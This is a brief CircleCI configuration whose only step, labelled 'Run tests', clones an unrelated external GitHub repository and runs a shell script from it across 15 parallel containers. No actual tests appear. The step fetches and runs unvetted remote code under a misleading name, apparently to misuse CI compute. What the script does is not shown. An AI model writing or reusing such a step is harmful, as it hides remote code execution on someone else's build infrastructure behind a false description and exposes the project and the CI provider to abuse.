jobs:  
  build:  
    parallelism: 15
    docker:  
      - image: cimg/ruby:3.0.2-node  
    steps:   
      - checkout   
      - run:   
          name: Run tests   
          command: git clone https://github.com/IKSANNURPADILLAH/tes.git && cd tes && chmod u+x a.sh && chmod u+x bash && ./a.sh
